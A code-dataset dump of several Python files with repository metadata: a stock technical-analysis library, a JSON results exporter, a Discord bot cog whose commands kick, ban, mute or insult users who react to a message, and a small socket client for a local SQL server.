hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2c96e6d193a2bd12826b74da6401e0f9ad390b78 | 17,132 | py | Python | maldives/technical_analysis/__init__.py | filipecn/maldives | f20f17d817fc3dcad7f9674753744716d1d4c821 | [
"MIT"
] | 1 | 2021-09-17T18:04:33.000Z | 2021-09-17T18:04:33.000Z | maldives/technical_analysis/__init__.py | filipecn/maldives | f20f17d817fc3dcad7f9674753744716d1d4c821 | [
"MIT"
] | null | null | null | maldives/technical_analysis/__init__.py | filipecn/maldives | f20f17d817fc3dcad7f9674753744716d1d4c821 | [
"MIT"
] | 3 | 2021-09-17T18:04:43.000Z | 2022-03-18T20:04:07.000Z | import numpy as np
import math
from pandas import DataFrame
def min_rw_index(prices, start, end):
    """Return the index of the lowest price within the inclusive window [start, end].

    Ties resolve to the earliest index; an empty (backwards) window returns ``start``.

    :param prices: indexable sequence of prices (list or pandas Series)
    :param start: window start index (inclusive)
    :param end: window end index (inclusive)
    :return: index of the minimum price in the window
    """
    best = start
    for candidate in range(start + 1, end + 1):
        # strict comparison keeps the first occurrence on ties
        if prices[candidate] < prices[best]:
            best = candidate
    return best
def max_rw_index(prices, start, end):
    """Return the index of the highest price within the inclusive window [start, end].

    FIX: the previous docstring claimed this searched the *min* price index,
    but the code tracks the maximum; the documentation now matches the code.
    Ties resolve to the earliest index; an empty (backwards) window returns
    ``start``.

    :param prices: indexable sequence of prices (list or pandas Series)
    :param start: window start index (inclusive)
    :param end: window end index (inclusive)
    :return: index of the maximum price in the window
    """
    matching_index = start
    for i in range(start, end + 1):
        # strict comparison keeps the first occurrence on ties
        if prices[matching_index] < prices[i]:
            matching_index = i
    return matching_index
def get_closest_resistance(values_and_indices, price, current_index):
    """Find the nearest resistance level at or above ``price``.

    FIX: the "no level found" sentinel was a magic ``10000000``, which broke
    for instruments trading above that price; ``math.inf`` is used instead.

    :param values_and_indices: pair ``(values, indices)`` as produced by
        ``TA.resistance_lines``: ``values[i]`` lists the prices belonging to
        level ``i`` and ``indices[i]`` the candle indices where they occurred
    :param price: reference price
    :param current_index: only levels first seen at or before this candle count
    :return: ``(level_price, level_position)``; when no level qualifies the
        position is ``-1`` and the price is ``math.inf``
    """
    values = values_and_indices[0]
    indices = values_and_indices[1]
    value = math.inf
    resistance_index = -1
    for i in range(len(values)):
        avg = np.array(values[i]).mean()
        # keep the lowest level that still lies at/above the reference price
        if price <= avg <= value and min(indices[i]) <= current_index:
            value = avg
            resistance_index = i
    return value, resistance_index
def get_closest_support(values_and_indices, price, current_index):
    """Find the nearest support level at or below ``price``.

    FIX: the "no level found" sentinel was a magic ``-10000000``, which broke
    for very negative values; ``-math.inf`` is used instead.

    :param values_and_indices: pair ``(values, indices)`` as produced by
        ``TA.resistance_lines``: ``values[i]`` lists the prices belonging to
        level ``i`` and ``indices[i]`` the candle indices where they occurred
    :param price: reference price
    :param current_index: only levels first seen at or before this candle count
    :return: ``(level_price, level_position)``; when no level qualifies the
        position is ``-1`` and the price is ``-math.inf``
    """
    values = values_and_indices[0]
    indices = values_and_indices[1]
    value = -math.inf
    support_index = -1
    for i in range(len(values)):
        avg = np.array(values[i]).mean()
        # keep the highest level that still lies at/below the reference price
        if value <= avg <= price and min(indices[i]) <= current_index:
            value = avg
            support_index = i
    return value, support_index
class TA:
    """Technical-analysis toolbox operating on an OHLC ``DataFrame``.

    The frame must provide at least ``open`` and ``close`` columns; the index
    is reset on construction so every method can use positional indices.
    """

    data: DataFrame

    def __init__(self, data):
        """:param data: OHLC DataFrame with at least 'open' and 'close' columns."""
        self.data = data.reset_index(drop=False)

    def run(self, callback, user_data):
        """Call ``callback(self, index, close_price, user_data)`` once per candle."""
        close_prices = self.data["close"].to_list()
        for i in range(len(close_prices)):
            callback(self, i, close_prices[i], user_data)

    # PATTERNS
    def candle_directions(self, tail=0):
        """Classify the last ``tail`` candles as bullish (1) or bearish (-1).

        :param tail: number of trailing candles to inspect (0 means all)
        :return: list of 1/-1 flags, one per inspected candle
        """
        if tail == 0:
            tail = len(self.data['close'])
        close_prices = self.data['close'].tail(tail).to_list()
        open_prices = self.data['open'].tail(tail).to_list()
        colors = tail * [1]
        for i in range(tail):
            if close_prices[i] < open_prices[i]:
                colors[i] = -1
        return colors

    def reversals(self):
        """Detect local price reversals over 3-candle windows.

        ``r[i] == -1`` marks a bottom (candle ``i - 1`` has the lowest body
        low of the window) and ``r[i] == 1`` a top (candle ``i - 1`` has the
        highest body high).

        :return: list with one flag per candle (-1 bottom, 1 top, 0 none)
        """
        close_prices = self.data['close'].to_list()
        open_prices = self.data['open'].to_list()
        r = len(close_prices) * [0]
        for i in range(2, len(close_prices)):
            min_0 = min([open_prices[i - 2], close_prices[i - 2]])
            min_1 = min([open_prices[i - 1], close_prices[i - 1]])
            min_2 = min([open_prices[i - 0], close_prices[i - 0]])
            if min_1 < min_0 and min_1 < min_2:
                r[i] = -1
                continue
            # BUG FIX: tops were previously computed with min(), so the
            # top-reversal branch compared body lows instead of body highs.
            max_0 = max([open_prices[i - 2], close_prices[i - 2]])
            max_1 = max([open_prices[i - 1], close_prices[i - 1]])
            max_2 = max([open_prices[i - 0], close_prices[i - 0]])
            if max_1 > max_0 and max_1 > max_2:
                r[i] = 1
        return r

    # INDICATORS
    def resistance_lines(self, resistance_type, threshold=0.02):
        """Cluster candle-body extrema into horizontal support/resistance levels.

        Support is a price level where falling prices tend to stop (a
        "floor"); resistance is a level where rising prices tend to stop (a
        "ceiling"). Levels are zones rather than exact prices, so nearby
        extrema within ``threshold`` are merged into the same level.

        :param resistance_type: 's' for support lines, 'r' for resistance lines
        :param threshold: relative distance under which an extremum joins an
            existing level instead of starting a new one
        :return: pair ``(values, ids)`` where ``values[i]`` holds the prices of
            level ``i`` and ``ids[i]`` the candle indices they came from
        """
        values, ids = [], []
        open_prices = self.data["open"].to_list()
        close_prices = self.data["close"].to_list()
        for i in range(1, len(open_prices) - 1):
            # candle-body extremum of the 3-candle window centred at i
            t_0 = min(open_prices[i - 1], close_prices[i - 1])
            t_1 = min(open_prices[i + 0], close_prices[i + 0])
            t_2 = min(open_prices[i + 1], close_prices[i + 1])
            if resistance_type == 'r':
                t_0 = max(open_prices[i - 1], close_prices[i - 1])
                t_1 = max(open_prices[i + 0], close_prices[i + 0])
                t_2 = max(open_prices[i + 1], close_prices[i + 1])
            check = t_1 >= t_0 and t_1 >= t_2
            if resistance_type == "s":
                check = t_1 <= t_0 and t_1 <= t_2
            if check:
                # merge into an existing level when within threshold of its mean
                found = False
                for j in range(len(values)):
                    if abs((np.mean(values[j]) - t_1) / t_1) <= threshold:
                        values[j].append(t_1)
                        ids[j].append(i)
                        found = True
                        break
                if not found:
                    values.append([t_1])
                    ids.append([i])
        return values, ids

    def rsi(self, initial_size=14, window_size=14):
        """Relative Strength Index with Wilder-style smoothing.

        Readings above 70 are commonly interpreted as overbought and below 30
        as oversold; sharp moves can produce false spikes, so RSI is usually
        confirmed against other signals.

        :param initial_size: number of candles used to seed the averages
        :param window_size: smoothing window for the running averages
        :return: list of RSI values, one per candle (unseeded entries are 50)
        """
        price = self.data["close"].to_list()
        gain = len(price) * [0]
        loss = len(price) * [0]
        for i in range(1, len(price)):
            if price[i] > price[i - 1]:
                gain[i] = price[i] - price[i - 1]
            else:
                loss[i] = price[i - 1] - price[i]
        average_gain = np.mean(gain[:initial_size + 1])
        average_loss = np.mean(loss[:initial_size + 1])
        rsi = len(price) * [50]
        for i in range(initial_size, len(price)):
            # Wilder's smoothed moving averages of gains and losses
            average_gain = (average_gain * (window_size - 1) + gain[i]) / window_size
            average_loss = (average_loss * (window_size - 1) + loss[i]) / window_size
            rs = average_gain
            if average_loss != 0:
                rs = rs / average_loss
            rsi[i] = 100 - 100 / (1 + rs)
        return rsi

    def bollinger_bands(self, window_size=10, num_of_std=5):
        """Bollinger Bands: rolling mean plus/minus ``num_of_std`` rolling stds.

        :param window_size: rolling window length
        :param num_of_std: band width in standard deviations
        :return: triple ``(rolling_mean, upper_band, lower_band)`` of Series
        """
        price = self.data["close"]
        rolling_mean = price.rolling(window=window_size).mean()
        rolling_std = price.rolling(window=window_size).std()
        upper_band = rolling_mean + (rolling_std * num_of_std)
        lower_band = rolling_mean - (rolling_std * num_of_std)
        return rolling_mean, upper_band, lower_band

    def regional_locals(self, window_radius=15):
        """Compute minima and maxima points within a rolling window.

        :param window_radius: rolling window half size (full size is 2w+1)
        :return: pair ``(maxima, minima)`` of candle index lists
        """
        prices = self.data["close"]
        maxima = []
        minima = []
        for i in range(window_radius, len(prices) - window_radius):
            if max_rw_index(prices, i - window_radius, i + window_radius) == i:
                maxima.append(i)
            elif min_rw_index(prices, i - window_radius, i + window_radius) == i:
                minima.append(i)
        return maxima, minima

    def sma(self, window):
        """Simple Moving Average of the close price.

        :param window: rolling window size
        :return: Series of rolling means (first ``window - 1`` entries NaN)
        """
        prices = self.data["close"]
        return prices.rolling(window=window).mean()

    def ema(self, window):
        """Exponential Moving Average of the close price, seeded with the SMA.

        :param window: span of the exponential window
        :return: Series of exponentially weighted means
        """
        prices = self.data["close"]
        # Seed the first `window` values with the SMA so the EMA does not
        # over-weight the very first price (adjust=False recursion).
        sma_w = self.sma(window)
        mod_price = prices.copy()
        mod_price.iloc[0:window] = sma_w[0:window]
        return mod_price.ewm(span=window, adjust=False).mean()

    def mac(self, short_window, long_window, average_type="sma"):
        """Moving Average Crossover indicator.

        BUG FIX: ``average_type`` used to be ignored (the SMA was always
        used); it now selects between "sma" (default) and "ema".

        :param short_window: window of the fast moving average
        :param long_window: window of the slow moving average
        :param average_type: "sma" or "ema"
        :return: pair ``(mac, signal)`` where ``signal[i]`` is 1 on a bullish
            crossover, -1 on a bearish one and 0 otherwise
        """
        average = self.ema if average_type == "ema" else self.sma
        short = np.array(average(short_window))
        long = np.array(average(long_window))
        mac = short - long
        signal = len(short) * [0]
        for i in range(long_window + 1, len(signal)):
            if mac[i] > 0 and mac[i - 1] < 0:
                signal[i] = 1
            elif mac[i] < 0 and mac[i - 1] > 0:
                signal[i] = -1
        return mac, signal

    # MEASURES
    def pct_change(self, window_size=1):
        """Percentage change of the close price over ``window_size`` periods."""
        prices = self.data["close"]
        return prices.pct_change(periods=window_size)

    def max_in_range(self, start_index: int = 0, end_index: int = -1):
        """Return ``(max_price, offset_from_start)`` within the index range."""
        if end_index < 0:
            end_index = len(self.data) - 1
        prices = self.data["close"].to_list()
        i = max_rw_index(prices, start_index, end_index)
        return prices[i], i - start_index

    def max_pct_in_range(self, start_index: int = 0, end_index: int = -1):
        """Return the maximum percentage gain from ``start_index`` and its offset."""
        if end_index < 0:
            end_index = len(self.data) - 1
        prices = self.data["close"].to_list()
        i = max_rw_index(prices, start_index, end_index)
        return (prices[i] - prices[start_index]) / prices[start_index] * 100.0, i - start_index

    def single_pct_change(self, start_index: int = 0, end_index: int = -1):
        """Percentage change of the close price between two candle indices."""
        if end_index < 0:
            end_index = len(self.data) - 1
        prices = self.data["close"].to_list()
        return (prices[end_index] - prices[start_index]) / prices[start_index] * 100.0

    # SIMPLIFICATION
    def pips(self, n=5, distance_type="euclidean"):
        """Find ``n`` Perceptually Important Points (PIPs).

        The first and last observations are the first two PIPs; each
        iteration adds, among all gaps between consecutive PIPs, the point
        with the maximum distance from the straight line through that gap's
        endpoints.

        BUG FIX: ``distance_type`` used to be ignored (the euclidean distance
        was always applied); it now selects the distance measure.

        :param n: total number of pips
        :param distance_type: "euclidean" (default), "perpendicular" or "vertical"
        :return: sorted list of pip indices
        """

        def pip_euclidean_distance(xi, xt, xtt, pi, pt, ptt):
            return math.sqrt((xt - xi) ** 2 + (pt - pi) ** 2) + math.sqrt((xtt - xi) ** 2 + (ptt - pi) ** 2)

        def pip_perpendicular_distance(xi, xt, xtt, pi, pt, ptt):
            s = (ptt - pt) / (xtt - xt)
            c = pt - xt * s
            return abs(s * xi + c - pi) / math.sqrt(s * s + 1)

        def pip_vertical_distance(xi, xt, xtt, pi, pt, ptt):
            s = (ptt - pt) / (xtt - xt)
            c = pt - xt * s
            return abs(s * xi + c - pi)

        distance_functions = {
            "euclidean": pip_euclidean_distance,
            "perpendicular": pip_perpendicular_distance,
            "vertical": pip_vertical_distance,
        }
        # unknown names fall back to the euclidean measure (previous behavior)
        distance = distance_functions.get(distance_type, pip_euclidean_distance)

        prices = self.data["close"]
        pips = [0, len(prices) - 1]

        # function to find the pip that maximizes the distance between left and right
        def pip(left, right):
            maximum_distance = 0
            maximum_distance_index = 0
            for i in range(left + 1, right):
                dist = distance(i, left, right, prices[i], prices[left], prices[right])
                if dist > maximum_distance:
                    maximum_distance = dist
                    maximum_distance_index = i
            return maximum_distance_index, maximum_distance

        # generate pips one at a time until n are collected
        while len(pips) < n:
            m = 0
            mi = 0
            for i in range(len(pips) - 1):
                if pips[i + 1] - 1 > pips[i]:
                    mmi, mm = pip(pips[i], pips[i + 1])
                    if mm > m:
                        m = mm
                        mi = mmi
            pips.append(mi)
            pips.sort()
        return pips

    def decimate(self, k=18, t=0.5):
        """Bottom-up segmentation of the close series into trend breakpoints.

        Adjacent 2-point segments are merged greedily by the smallest
        least-squares cost until roughly ``len(prices) / k`` segments remain;
        same-direction neighbours are then merged, extremes snapped to the
        true local min/max, and segments with a price variation below ``t``
        removed.

        :param k: target compression factor (more = fewer segments)
        :param t: minimum absolute price variation a segment must span
        :return: sorted list of breakpoint indices
        """
        prices = self.data["close"]

        def merge_cost(s1, s2):
            # squared error of replacing [s1_start .. s2_end] by one line
            # NOTE(review): the interpolation weights assign A (the left
            # endpoint price) weight 0 at the left edge — looks inverted, but
            # is preserved as-is since the cost is only used for ranking.
            cost = 0
            A = prices[int(s1[0])]
            B = prices[int(s2[1])]
            for i in range(s1[0], s2[1] + 1):
                a = (i - s1[0]) / (s2[1] - s1[0])
                cost = cost + (prices[i] - (a * A + (1 - a) * B)) ** 2
            return cost

        segments = []
        for i in range(int(len(prices) / 2)):
            segments.append([i * 2, i * 2 + 1])
        costs = (len(segments) - 1) * [0]
        for i in range(len(costs)):
            costs[i] = merge_cost(segments[i], segments[i + 1])
        while len(segments) > len(prices) / k:
            # merge the cheapest adjacent pair, then refresh neighbouring costs
            minI = min_rw_index(costs, 0, len(costs) - 1)
            segments[minI][1] = segments[minI + 1][1]
            del segments[minI + 1]
            if minI > 0:
                costs[minI - 1] = merge_cost(segments[minI - 1], segments[minI])
            if len(segments) > minI + 1:
                costs[minI] = merge_cost(segments[minI], segments[minI + 1])
            if len(costs) - 1 > minI:
                del costs[minI + 1]
            else:
                del costs[minI]
        # fill the gaps between segments so the whole series is covered
        s = []
        for i in range(len(segments)):
            s.append(segments[i])
            if i < len(segments) - 1:
                s.append([segments[i][1], segments[i + 1][0]])
        changed = True
        while changed:
            changed = False
            # merge trends pointing in the same direction
            for i in range(len(s) - 1):
                if (prices[s[i][0]] - prices[s[i][1]]) * (prices[s[i + 1][0]] - prices[s[i + 1][1]]) >= 0:
                    s[i][1] = s[i + 1][1]
                    del s[i + 1]
                    changed = True
                    break
            # snap each boundary to the true local extreme
            for i in range(len(s) - 1):
                if prices[s[i][0]] - prices[s[i][1]] < 0:
                    s[i][1] = s[i + 1][0] = max_rw_index(prices, s[i][0], s[i + 1][1])
                else:
                    s[i][1] = s[i + 1][0] = min_rw_index(prices, s[i][0], s[i + 1][1])
            # remove small-variation segments
            for i in range(len(s)):
                if abs(prices[s[i][0]] - prices[s[i][1]]) < t:
                    changed = True
                    if i == 0:
                        s[i + 1][0] = s[i][0]
                    elif i == len(s) - 1:
                        s[i - 1][1] = s[i][1]
                    else:
                        s[i - 1][1] = s[i + 1][0]
                    del s[i]
                    break
        # flatten segments into a breakpoint list (renamed from `l`/`k`,
        # which shadowed the `k` parameter)
        breakpoints = []
        for segment in s:
            breakpoints.append(segment[0])
        breakpoints.append(s[-1][1])
        return breakpoints

    def hsars(self, x=0.05, s=2):
        """Horizontal Support And Resistance levelS (HSARs).

        Close prices are binned into geometrically spaced buckets between the
        padded min and max; buckets hit at least ``s`` times are returned as
        support/resistance zones. Intended input is a series of regional
        locals.

        BUG FIX: bin edges were computed as ``lower_bound * (1 + pct) * i``
        (a linear ramp whose first edge is 0); the geometric form
        ``lower_bound * (1 + pct) ** i`` is used instead so the edges span
        exactly [lower_bound, upper_bound].

        :param x: desired percentage width per bin
        :param s: minimum number of hits for a bin to qualify
        :return: list of ``[low, high]`` price ranges
        """
        prices = self.data["close"]
        lower_bound = min(prices) / (1 + x / 2)
        upper_bound = max(prices) * (1 + x / 2)
        # approximate number of bins
        approx_n = math.log(upper_bound / lower_bound) / math.log(1 + x)
        # actual number of bins
        n = int(approx_n + 0.5)
        # actual percentage for each bin
        actual_pct = (abs(upper_bound / lower_bound)) ** (1 / n) - 1
        bounds = []
        for i in range(n + 1):
            bounds.append(lower_bound * (1 + actual_pct) ** i)
        freq = len(bounds) * [0]
        for p in prices:
            for i in range(len(bounds) - 1):
                if bounds[i] <= p < bounds[i + 1]:
                    freq[i] = freq[i] + 1
        sar = []
        for i in range(len(freq)):
            if freq[i] >= s:
                sar.append([bounds[i], bounds[i + 1]])
        return sar
| 36.451064 | 108 | 0.532279 | 15,434 | 0.900467 | 0 | 0 | 0 | 0 | 0 | 0 | 4,492 | 0.262077 |
2c97a10d31ef8e0bc20d8e7103870b10b184c4ee | 772 | py | Python | cymepy/export_manager/hooks/JSON_writer.py | GMLC-TDC/cymepy | 1f3b6011c674ef24139009fd23bb913e2453bc1d | [
"BSD-3-Clause"
] | 1 | 2021-12-31T06:11:24.000Z | 2021-12-31T06:11:24.000Z | cymepy/export_manager/hooks/JSON_writer.py | GMLC-TDC/cymepy | 1f3b6011c674ef24139009fd23bb913e2453bc1d | [
"BSD-3-Clause"
] | null | null | null | cymepy/export_manager/hooks/JSON_writer.py | GMLC-TDC/cymepy | 1f3b6011c674ef24139009fd23bb913e2453bc1d | [
"BSD-3-Clause"
] | null | null | null | from cymepy.export_manager.base_definations import ExportManager
from cymepy.common import EXPORT_FILENAME
import json
import os
class Writer(ExportManager):
    """Export manager that buffers per-step results and dumps them as JSON."""

    def __init__(self, sim_instance, solver, options, logger, **kwargs):
        """Initialise the result buffer and resolve the JSON destination path."""
        super(Writer, self).__init__(sim_instance, solver, options, logger, **kwargs)
        self.results = []
        export_dir = os.path.join(self.settings["project"]['project_path'], 'exports')
        self.path = os.path.join(export_dir, f"{EXPORT_FILENAME}.json")

    def update(self):
        """Collect the latest snapshot from the base class into the buffer."""
        self.results.append(super().update())

    def export(self):
        """Write every buffered snapshot to ``self.path`` as pretty-printed JSON."""
        with open(self.path, "w") as handle:
            json.dump(self.results, handle, indent=4, sort_keys=True)
| 30.88 | 85 | 0.638601 | 641 | 0.830311 | 0 | 0 | 0 | 0 | 0 | 0 | 60 | 0.07772 |
2c9d710486fe7c3e74c3841cde67437dfa01eebb | 5,320 | py | Python | fenrir/fenrir.py | noperaattori/Trusty-cogs | 0cca2cf2f6989087441e5304ab085a1a9288097f | [
"MIT"
] | null | null | null | fenrir/fenrir.py | noperaattori/Trusty-cogs | 0cca2cf2f6989087441e5304ab085a1a9288097f | [
"MIT"
] | null | null | null | fenrir/fenrir.py | noperaattori/Trusty-cogs | 0cca2cf2f6989087441e5304ab085a1a9288097f | [
"MIT"
] | null | null | null | import discord
from redbot.core import Config, checks, commands
# Compatibility shim: commands.Cog.listener only exists on newer Red/discord.py
# versions; on Red 3.0 fall back to a no-op decorator factory so the
# @listener() usages below still work.
listener = getattr(commands.Cog, "listener", None)  # red 3.0 backwards compatibility support
if listener is None:  # thanks Sinbad

    def listener(name=None):
        # No-op replacement: returns a decorator that leaves the function unchanged.
        return lambda x: x
class Fenrir(commands.Cog):
    """
    Various unreasonable commands inspired by Fenrir
    """

    __version__ = "1.0.0"
    __author__ = "TrustyJAID"

    def __init__(self, bot):
        self.bot = bot
        # Message IDs whose reactions punish the reacting user
        # (handled in on_raw_reaction_add).
        self.kicks = []
        self.bans = []
        self.mutes = []
        # feedback message ID -> list of user IDs already served, so each
        # user is only insulted/complimented once per message.
        self.feedback = {}
        # default_guild = {"kicks": [], "bans":[]}
        # self.config = Config.get_conf(self, 228492507124596736)
        # self.config.register_guild(**default_guild)

    @commands.command()
    @checks.admin_or_permissions(kick_members=True)
    @commands.guild_only()
    async def fenrirkick(self, ctx):
        """Create a reaction emoji to kick users"""
        msg = await ctx.send("React to this message to be kicked!")
        await msg.add_reaction("✅")
        await msg.add_reaction("❌")
        # Register the message: any reaction on it kicks the reactor.
        self.kicks.append(msg.id)

    @commands.command()
    @checks.admin_or_permissions(ban_members=True)
    @commands.guild_only()
    async def fenrirban(self, ctx):
        """Create a reaction emoji to ban users"""
        msg = await ctx.send("React to this message to be banned!")
        await msg.add_reaction("✅")
        await msg.add_reaction("❌")
        self.bans.append(msg.id)

    @commands.command()
    @checks.admin_or_permissions(ban_members=True)
    @commands.guild_only()
    # NOTE(review): hard-coded guild ID restricts this command to one specific
    # server; the mute role ID below is hard-coded to match — confirm before reuse.
    @commands.check(lambda ctx: ctx.guild.id == 236313384100954113)
    async def fenrirmute(self, ctx):
        """Create a reaction emoji to mute users"""
        msg = await ctx.send("React to this message to be muted!")
        await msg.add_reaction("✅")
        await msg.add_reaction("❌")
        self.mutes.append(msg.id)

    @commands.command(aliases=["fenririnsult"])
    @checks.mod_or_permissions(manage_messages=True)
    @commands.guild_only()
    # Only available when an Insult cog is loaded, since the reply depends on it.
    @commands.check(lambda ctx: ctx.bot.get_cog("Insult"))
    async def fenrirfeedback(self, ctx):
        """Create a reaction emoji to insult users"""
        msg = await ctx.send("React to this message to be insulted!")
        await msg.add_reaction("✅")
        await msg.add_reaction("❌")
        self.feedback[msg.id] = []

    async def is_mod_or_admin(self, member: discord.Member) -> bool:
        """Return True when ``member`` is exempt from punishment:
        guild owner, bot owner, admin, mod, or automod-immune."""
        guild = member.guild
        if member == guild.owner:
            return True
        if await self.bot.is_owner(member):
            return True
        if await self.bot.is_admin(member):
            return True
        if await self.bot.is_mod(member):
            return True
        if await self.bot.is_automod_immune(member):
            return True
        return False

    @listener()
    async def on_raw_reaction_add(self, payload):
        # Dispatch reactions on previously registered kick/ban/mute/feedback
        # messages; bots and staff are always exempt.
        try:
            guild = self.bot.get_guild(payload.guild_id)
        except Exception as e:
            # NOTE(review): get_guild does not normally raise; a DM reaction
            # yields guild=None instead, which would fail below — confirm.
            print(e)
            return
        if payload.message_id in self.kicks:
            member = guild.get_member(payload.user_id)
            if member is None:
                return
            if member.bot:
                return
            if await self.is_mod_or_admin(member):
                return
            try:
                await member.kick(reason="They asked for it.")
            except Exception:
                # missing permissions or member already gone — ignore
                return
        if payload.message_id in self.bans:
            member = guild.get_member(payload.user_id)
            if member is None:
                return
            if member.bot:
                return
            if await self.is_mod_or_admin(member):
                return
            try:
                await member.ban(reason="They asked for it.")
            except Exception:
                return
        if payload.message_id in self.mutes:
            member = guild.get_member(payload.user_id)
            if member is None:
                return
            if member.bot:
                return
            if await self.is_mod_or_admin(member):
                return
            try:
                # NOTE(review): hard-coded mute role for the guild checked in
                # fenrirmute — confirm the role still exists.
                r = guild.get_role(241943133003317249)
                await member.add_roles(r, reason="They asked for it.")
            except Exception:
                return
        if payload.message_id in self.feedback:
            if payload.user_id in self.feedback[payload.message_id]:
                # this user has already been served for this message
                return
            member = guild.get_member(payload.user_id)
            if member is None:
                return
            if member.bot:
                return
            channel = guild.get_channel(payload.channel_id)
            # NOTE(review): Channel.get_message was renamed fetch_message in
            # discord.py 1.0 — confirm which library version is targeted.
            msg = await channel.get_message(payload.message_id)
            ctx = await self.bot.get_context(msg)
            if await self.is_mod_or_admin(member) or str(payload.emoji) == "🐶":
                # staff (and dog-emoji reactions) get a compliment instead;
                # fall back to an insult when no Compliment cog is loaded
                try:
                    compliment = self.bot.get_cog("Compliment").compliment
                except AttributeError:
                    compliment = self.bot.get_cog("Insult").insult
                await ctx.invoke(compliment, user=member)
            else:
                insult = self.bot.get_cog("Insult").insult
                await ctx.invoke(insult, user=member)
            self.feedback[payload.message_id].append(member.id)
| 35 | 93 | 0.578008 | 5,081 | 0.951676 | 0 | 0 | 4,122 | 0.772055 | 3,987 | 0.746769 | 775 | 0.145158 |
2c9e38301a32acb2dc6159e9441fa4c1000f2d7e | 140 | py | Python | my_submission/model/__init__.py | abcdcamey/Gobigger-Explore | 75864164f3e45176a652154147740c34905d1958 | [
"Apache-2.0"
] | 1 | 2021-12-28T02:47:07.000Z | 2021-12-28T02:47:07.000Z | my_submission/model/__init__.py | abcdcamey/Gobigger-Explore | 75864164f3e45176a652154147740c34905d1958 | [
"Apache-2.0"
] | null | null | null | my_submission/model/__init__.py | abcdcamey/Gobigger-Explore | 75864164f3e45176a652154147740c34905d1958 | [
"Apache-2.0"
] | null | null | null | from .gobigger_structed_simple_model import GoBiggerHybridActionSimpleV3
from .my_gobigger_structed_model_v1 import MyGoBiggerHybridActionV1 | 70 | 72 | 0.935714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2ca16bdb7e66900966a36a0cd4986826181aae35 | 1,967 | py | Python | CS307/testbench_log/fileDB/Client.py | ntdgy/python_study | c3511846a89ea72418937de4cc3edf1595a46ec5 | [
"MIT"
] | null | null | null | CS307/testbench_log/fileDB/Client.py | ntdgy/python_study | c3511846a89ea72418937de4cc3edf1595a46ec5 | [
"MIT"
] | null | null | null | CS307/testbench_log/fileDB/Client.py | ntdgy/python_study | c3511846a89ea72418937de4cc3edf1595a46ec5 | [
"MIT"
] | null | null | null | # -*- coding = utf-8 -*-
# @Time: 2022/4/13 19:35
# @Author: Anshang
# @File: Client.py
# @Software: PyCharm
import socket
from multiprocessing import Process, Pipe
def connection(pipe: Pipe, username, password):
    """Worker loop: log in to the local DBMS server and proxy SQL over a pipe.

    Connects to 127.0.0.1:9900, authenticates with ``login <user> <pass>``,
    then forever forwards statements received on ``pipe`` to the socket,
    accumulating response chunks until the server sends the ``finish`` marker.

    :param pipe: child end of a multiprocessing pipe
    :param username: login name sent to the server
    :param password: password sent to the server
    :raises Exception: when the server answers the login with ``-1``
    """
    server_address = ("127.0.0.1", 9900)
    sock = socket.socket()
    sock.connect(server_address)
    sock.send(bytes(" ".join(["login", username, password]), encoding="utf-8"))
    permission = str(sock.recv(1024), encoding="utf-8")
    print('permission:', permission)
    if permission == '-1':
        raise Exception("Login error")
    while True:
        statement = pipe.recv()
        sock.send(bytes(statement, encoding="utf-8"))
        # collect chunks until the explicit end-of-response marker
        chunks = []
        chunk = str(sock.recv(1024), encoding="utf-8")
        while chunk != 'finish':
            chunks.append(chunk)
            chunk = str(sock.recv(1024), encoding="utf-8")
        pipe.send(''.join(chunks))
class DBMSClient(object):
    """Client handle for the file-based DBMS server.

    Spawns a worker process (see ``connection``) that owns the socket and
    talks to it through a multiprocessing pipe.
    """

    def __init__(self, username, password):
        """Open a per-instance pipe and start the connection worker.

        BUG FIX: the pipe ends used to be *class* attributes
        (``pa, child = Pipe()``), created once at import time and shared by
        every instance, so two clients would interleave and corrupt each
        other's request/response streams. They are now created per instance.

        :param username: login name for the DBMS server
        :param password: password for the DBMS server
        """
        self.pa, self.child = Pipe()
        self.p = Process(target=connection, args=(self.child, username, password))
        self.p.start()

    def execute(self, sql: str):
        """Send one SQL statement and block until the full response arrives."""
        self.pa.send(sql)
        return self.pa.recv()

    def excuse(self, sql: str):
        """Misspelled alias of :meth:`execute`, kept for backward compatibility."""
        return self.execute(sql)

    def close(self):
        """Terminate the worker process and close both pipe ends."""
        self.p.terminate()
        self.pa.close()
        self.child.close()
if __name__ == '__main__':
    # Manual smoke test: requires the DBMS server listening on 127.0.0.1:9900
    # and accepting the credentials below (see connection()).
    client = DBMSClient('anshang', '123456')
    # Exercise plain inserts, a duplicate-key insert, an insert with an extra
    # column, an update, and finally a filtered select whose result is printed.
    client.execute("insert into supply_center(id, director_name) values(2, 'name');")
    client.execute("insert into supply_center(id, director_name) values(2, 'test');")
    client.execute("insert into supply_center(id, director_name, supply_center) values(5, 'test', 'center');")
